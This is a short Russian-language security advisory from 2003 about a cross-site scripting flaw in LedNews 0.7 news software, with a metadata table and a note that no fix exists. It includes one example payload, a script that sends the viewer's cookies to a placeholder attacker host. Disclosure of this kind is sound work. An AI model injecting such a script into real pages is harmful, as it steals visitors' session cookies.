Security Lab

Межсайтовый скриптинг в LedNews

Дата публикации:19.06.2003
Всего просмотров:971
Опасность:
Низкая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: LedNews 0.x
Описание: Уязвимость в проверке правильности ввода обнаружена в LedNews. Удаленный пользователь может выполнить XSS нападение.

Удаленный пользователь может внедрить специально сформированный текст в сообщение, который выполнит произвольный код сценария в браузере пользователя, просматривающего это сообщение. Пример:

<script>
document.location.replace('http://[attacker]/cgi-bin/cookiemonster.cgi?'+document.cookie);
</script>
Уязвимость обнаружена в LedNews 0.7

Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: XSS Vulnerability in LedNews (CGI/Perl) v0.7